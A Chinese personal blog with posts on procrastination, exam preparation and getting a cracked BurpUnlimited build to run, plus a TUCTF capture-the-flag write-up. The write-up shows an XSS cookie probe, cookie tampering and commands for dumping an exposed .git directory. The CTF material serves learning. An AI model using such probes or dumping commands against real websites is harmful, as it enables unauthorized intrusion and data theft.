我的情况当然没这个段子里描述的那么严重，每次都能有惊无险地完成任务。但拖延症带来的焦虑感和自我厌恶也让我非常痛苦，我曾经以为这辈子都会被拖延症所折磨。
真的，我从来没想过能让我这个拖延症晚期患者痊愈的居然是一条微博。

以上是来自知乎用户盛楚麒的分享

不得不说，那种又焦虑又什么都做不了的状态我正在经历。

而且，我的情况要严重的多，并没有一个人来给我定deadline，所以我自己的deadline可以一拖再拖，最终什么也没有做。

折磨我一个多月的所谓的论文是这样，复习考试也是。考试还好些，可能更多的是自大。。。QAQ
论文真的是压得我喘不过气的重量，我对学术了解太少，等等原因。但是！
但是这些都不是理由！！！

一把梭！

随笔

STEINS;GA…

2017年12月23日2018年6月4日
by harmoc

2017.12.23

说起来，今天是我公历的20岁生日，也是我的学长学姐考研考试开始的日子。嗯，意味着距离我自己的考研满打满算只有一年了。

这两天相当恐慌，感觉自己还有好多事要做，还有好多技术要学，离大佬还差得很远，但是，要考研了。

意味着不能再熬夜，不能再晚起，不能再玩游戏，不能再边看番边嘿嘿傻笑。关键是没有人来逼我，一切都只能靠我自己。

有点害怕，说真的。

我想做在技术上有一定的高度，想做我想做的事业，不想把我学业的终点定义在这么个垃圾学校。

还记得当初看《命运石之门》，一直鼓舞于它的op，尤其是那句Hacking to the gate，与凶真不一样的是，他要拯救别人，我想拯救自己。

我也想像他那个狂气的疯狂科学家一样，做个真正的黑客，那么，就让我在刚刚及冠的这一天，用尽我最后的中二呐喊：

Hacking to the Gate！！！

El Psy Congroo.

千剑

Burp_Suit…

2017年12月18日2018年6月4日
by harmoc

前段时间我的burp1.7.13过期，去群里问也好，去搜索引擎找也好，去各种各样安全论坛也好，最终1.7以上的版本只有BurpUnlimited能用。
然而只要把它的文件放到我的工具包文件夹里就不能用，放在其他地方就行。
最终发现，竟然是文件路径里不能带空格。。。。java会出错。。。

To have no unexpected error, please leave all file in the folders which have not any space character (including java binary file in case not run with default java).

随手附上其Github地址：
https://github.com/mxcxvn/BurpUnlimited

Write up

TUCTF

2017年12月14日2018年6月4日
by harmoc

前些日子打了一下TUCTF，很惭愧，又是几百名的成绩，不过YY一下自己在国际上能排三百多也还可以，咳咳，精神胜利法。

一直没有时间整理，再加上也没做出来多少。今天发现CTFtime上原来是有write up模块的，QAQ。

先说一下它的一道Web，Cookie Duty

Web-Cookie Duty

显然，从Cookie做文章了，testalert(document.cookie)

可以看到题目的意思是你身份成功了，但权限不对，不是admin。但看到not_admin=1，也就很容易联想到改这个http头了。
burp修改之，得flag。

Web-Git Gud

Git Gud

Jimmy has begun learning about Version Control Systems and decided it was a good time to put it into use for his person website. Show him how to Git Gud.
http://gitgud.tuctf.com

这题很有意思，国内还没遇到用git出题和解题的姿势。学习了。

那就是用git咯。

I have solved a challenge like this in SVATTT-2017 Qual Round , so to deal with this challenge, first we need to Dump the link/.git/ , then Extract it, then Grep for the flag

这是一个写wp老哥的思路。看样子国外还挺喜欢用git出题。

首先dump(转储) link/.git/，即
./gitdumper.sh http://gitgud.tuctf.com/.git/ Folder-To-Save

然后它没显示，此处是用ls -lia去see this file.

最后，Extract it.

./extractor.sh git-saved-folder folder-to-save

然后就grep for flag了。

grep -rnw TUCTF

P.S.git泄露神器，GitHack

Crypto-The Never Ending Crypto

Challenge:

Welcome to the never ending crypto!
How quickly can you make it through?

nc neverending.tuctf.com 12345

我连上之后发现是输入一段字符，观察输出密文，然后它会给你一个密文，让你还原。
但时间不长，几秒钟，so，得用写算法。

Assume our send data is sdata
Our sdata when encrypted is s_encrypt
And the cipher they give us: cipher
To decrypt we need to find key = ord( s_encrypt[0] ) – sdata[0] )
Then cipher[i] = ( cipher[i] – key – 32 ) % (127 – 32) + 32

看看别人的解密思维。。。我怎么就混乱了呢。。。

可以说非常清晰了，写个脚本，一跑了事。

Crypto-Transporter

Challenge:

**We have discovered some hackers have infiltrated our mainframe and may have exfiltrated some highly classified data.
Can you help us figure out what they stole?
**
nc transporter.tuctf.com 54321

连上之后给了一个长base64，解开之后是两段base64，一个再解是给了一个enc_key和一个n一个e，另一个invalid。

Maybe it is encrypted with AES – DES ? Because we can see the IV, and with the view of this data in hex. We see that after the 69763a ( iv: ) is 16 bytes => which decode to 8 bytes ascii . and The IV is 8 bytes huh? should be DES.

而后，看wp里推断是DES。这点真的学到了，贴出了。

公钥（n,e）不算长到不能分解出p，q
再解enc_key

然后用pyDES解出。

VM-Gateway

是时候展现真正的技术了，这是我做的题目种类最优秀的ctf了，第一次见一次CTF出VM题的。涨姿势。

然而我连最初的进入vm都没有做到。。。。。
实在弱鸡。

This CTF provided a VM which encompassed a number of different challenges, the first part of which is to actually access it. When booting up the VM, we find that the drive it's accessing is encrypted and you need a passkey to decrypt it. Luckily there is an unencrypted drive that is accessible.

To access this, we need to add a live CD to the VM so that we can boot off that instead. I chose to use Kali Linux for this. Once we boot into Kali, we can access the unencrypted drive which is labeled "Boot".

Right away there is a file that stands out: "usefultool.exe"
Running this we discover that it is just a program that ROT13's whatever string you provide, so this is a pretty good indicator that our flag will be a ROT13 that needs to be decoded.

Looking around the drive more, nothing of use was really found, so I took a closer look at the .exe. Running strings on it I found something interesting.

However, this turned out to only be part of the flag. Looking closer at the strings output, it seems that the exe has been packed with UPX. Using UPX to unpack it, we can finally get the full output of all the strings, as well as our full ROT13 flag.

大佬的解释如是，已经不容置喙了。。
只敢谈一下个人理解，我没做出来的点在于没找到an unencrypted drive that is accessible，这个是个突破口，我就死于老虎吃天，无从下口。然后就是 "usefultool.exe"解密
rot13,。

VM-Leap of Faith

题面很有意思，说这个题目已经在前面的题目里给出。flag里有秘密，因为当时没做到这儿，具体的flag也不得而知，很遗憾。不过很喜欢这种想象力。

把大佬的解释放出来吧。

This challenge utilized the same exe from the previous challenge. I overthought this one a lot, but looking at all the strings in GDB by accessing the function 'randomPaddingFunction' that I was told to ignore, I finally realized that the first letter of each string gave the flag!

第一次稍微做了下国际赛，果然很爽。。。
向活跃在这第四空间的全体CTFer致敬。
思维万岁。